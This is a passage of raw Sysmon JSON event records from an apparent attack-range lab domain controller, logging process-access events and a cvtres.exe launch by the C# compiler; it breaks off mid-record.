{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5202,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5203,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5204,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5205,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5206,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.953\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001080050A00}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.953","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001080050A00}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.025\r\nProcessGuid: {A837DB8D-032C-5F25-0000-001019090A00}\r\nProcessId: 3016\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESD2C8.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\CSC122B8440669D44C2A5583D80E4C9E730.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-001080050A00}\r\nParentProcessId: 4748\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:44.025","ProcessGuid":"{A837DB8D-032C-5F25-0000-001019090A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RESD2C8.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\CSC122B8440669D44C2A5583D80E4C9E730.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-001080050A00}","ParentProcessId":"4748","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\5yc0l14x\\5yc0l14x.cmdline\"","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:44","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:44.015\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-001080050A00}\r\nSourceProcessId: 4748\r\nSourceThreadId: 4660\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: 